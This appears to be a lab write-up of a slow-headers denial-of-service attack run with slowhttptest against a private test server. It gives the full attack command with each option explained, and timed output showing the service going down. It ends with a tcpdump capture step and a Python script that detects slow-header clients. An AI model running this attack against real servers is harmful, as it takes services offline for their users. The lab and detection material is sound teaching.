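Lab> slowhttptest DoS Attack
The tool is not included in Kali Linux by default, so install it with apt.
-c 4000 : open 4000 connections (sessions)
-g : generate statistics on socket state changes
-o : write the report to an output file
-i : interval between follow-up data transmissions
-r : number of sessions connected per second
-t : send requests with the GET method
-x : maximum length in bytes of follow-up data
-p : treat the server as unreachable if there is no response after 3 seconds
-u : target URL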
Attacker ~# apt-get -y install slowhttptest etherape
Attacker ~# slowhttptest -c 4000 -g -o slowloris -i 10 -r 100 -t GET -x 3 -p 3 -u http://192.168.108.101
Mon Feb 28 07:31:34 2022: set open files limit to 4010
Mon Feb 28 07:31:34 2022:
Mon Feb 28 07:31:34 2022:
slowhttptest version 1.8.2
- https://github.com/shekyan/slowhttptest -
test type: SLOW HEADERS
number of connections: 4000
URL: http://192.168.108.101/
verb: GET
cookie:
Content-Length header value: 4096
follow up data max size: 10
interval between follow up data: 10 seconds
connections per seconds: 100
probe connection timeout: 3 seconds
test duration: 240 seconds
using proxy: no proxy
Mon Feb 28 07:31:34 2022:
slow HTTP test status on 0th second:
initializing: 0
pending: 1
connected: 0
error: 0
closed: 0
service available: YES
Mon Feb 28 07:31:39 2022:
slow HTTP test status on 5th second:
initializing: 0
pending: 161
connected: 168
error: 0
closed: 0
service available: YES
Mon Feb 28 07:31:44 2022:
slow HTTP test status on 10th second:
initializing: 0
pending: 480
connected: 266
error: 0
closed: 0
service available: NO
Mon Feb 28 07:31:49 2022:
slow HTTP test status on 15th second:
initializing: 0
pending: 724
connected: 332
error: 0
closed: 0
service available: NO
Mon Feb 28 07:31:54 2022:
slow HTTP test status on 20th second:
initializing: 0
pending: 1069
connected: 404
error: 0
closed: 5
service available: NO
Mon Feb 28 07:31:59 2022:
slow HTTP test status on 25th second:
initializing: 0
pending: 1399
connected: 460
error: 0
closed: 36
service available: NO
Mon Feb 28 07:32:04 2022:
slow HTTP test status on 30th second:
initializing: 0
pending: 1727
connected: 467
error: 0
closed: 116
service available: NO
Mon Feb 28 07:32:09 2022:
slow HTTP test status on 35th second:
initializing: 0
pending: 2071
connected: 485
error: 0
closed: 172
service available: NO
Mon Feb 28 07:32:14 2022:
slow HTTP test status on 40th second:
initializing: 0
pending: 2418
connected: 496
error: 0
closed: 236
service available: NO
^C <-- Press Ctrl + C to stop.
Mon Feb 28 07:32:17 2022:
Test ended on 43th second
Exit status: Cancelled by user
CSV report saved to slowloris.csv
HTML report saved to slowloris.html
On the UTM, tcpdump can be used to save the packets so they can be analyzed later.
UTM# tcpdump -w slowhttptest.pcap port 80
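One way to triage that capture afterwards, as an added example that is not part of the original post: it reads the text form of the capture (assumed to come from `tcpdump -nn -tt -r slowhttptest.pcap`) and reports clients holding several connections on which data keeps trickling in but the server never answers. The function name, thresholds and client addresses are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample (not from the post's capture), shaped like the output of
# `tcpdump -nn -tt -r slowhttptest.pcap`. 192.168.108.101 is the lab target;
# the client addresses .50 and .60 are made up.
SAMPLE = """\
1646033495.000000 IP 192.168.108.50.40001 > 192.168.108.101.80: Flags [P.], seq 1:201, ack 1, win 502, length 200: HTTP: GET / HTTP/1.1
1646033495.000400 IP 192.168.108.101.80 > 192.168.108.50.40001: Flags [.], ack 201, win 509, length 0
1646033495.100000 IP 192.168.108.50.40002 > 192.168.108.101.80: Flags [P.], seq 1:201, ack 1, win 502, length 200: HTTP: GET / HTTP/1.1
1646033496.000000 IP 192.168.108.60.51000 > 192.168.108.101.80: Flags [P.], seq 1:121, ack 1, win 502, length 120: HTTP: GET / HTTP/1.1
1646033496.002000 IP 192.168.108.101.80 > 192.168.108.60.51000: Flags [P.], seq 1:1461, ack 121, win 509, length 1460: HTTP: HTTP/1.1 200 OK
1646033505.000000 IP 192.168.108.50.40001 > 192.168.108.101.80: Flags [P.], seq 201:209, ack 1, win 502, length 8: HTTP
1646033505.100000 IP 192.168.108.50.40002 > 192.168.108.101.80: Flags [P.], seq 201:208, ack 1, win 502, length 7: HTTP
1646033515.000000 IP 192.168.108.50.40001 > 192.168.108.101.80: Flags [P.], seq 209:218, ack 1, win 502, length 9: HTTP
1646033515.100000 IP 192.168.108.50.40002 > 192.168.108.101.80: Flags [P.], seq 208:216, ack 1, win 502, length 8: HTTP
"""
LINE = re.compile(r"^(\d+\.\d+) IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[[^\]]*\].*?length (\d+)")

def slow_header_sources(text, server_port=80, min_age=15.0, min_flows=2):
    """Map client IP -> count of flows matching the slow-headers pattern."""
    flows = defaultdict(lambda: {"first": None, "last": 0.0, "c_pkts": 0, "s_bytes": 0})
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        ts, src, sport, dst, dport, length = m.groups()
        ts, length = float(ts), int(length)
        if int(dport) == server_port:      # client -> server
            f = flows[(src, sport)]
            f["c_pkts"] += 1 if length else 0
        elif int(sport) == server_port:    # server -> client
            f = flows[(dst, dport)]
            f["s_bytes"] += length
        else:
            continue
        f["first"] = ts if f["first"] is None else f["first"]
        f["last"] = ts
    hits = defaultdict(int)
    for (ip, _port), f in flows.items():
        # Heuristic: repeated client writes spread over time while the server
        # has sent no payload, i.e. the request headers never completed.
        if f["c_pkts"] >= 2 and f["s_bytes"] == 0 and f["last"] - f["first"] >= min_age:
            hits[ip] += 1
    return {ip: n for ip, n in hits.items() if n >= min_flows}
```

Connections that merely idle after a completed response are not counted, because the server has already sent payload on them.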